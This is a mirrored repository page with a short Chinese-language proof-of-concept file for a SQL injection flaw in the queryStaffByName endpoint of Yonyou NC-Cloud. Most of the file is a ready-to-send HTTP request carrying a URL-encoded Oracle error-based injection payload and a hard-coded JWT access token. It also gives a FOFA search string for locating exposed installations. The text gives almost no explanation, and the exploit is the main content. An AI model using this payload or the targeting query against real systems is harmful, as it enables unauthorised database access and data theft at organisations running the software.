admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 22:14:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/用友OA/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md

22 lines
1.0 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞。
## fofa
```yaml
app="用友-NC-Cloud"
```
## poc
```js
GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image-20240801101631113](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011016195.png)
Reference in New Issue Copy Permalink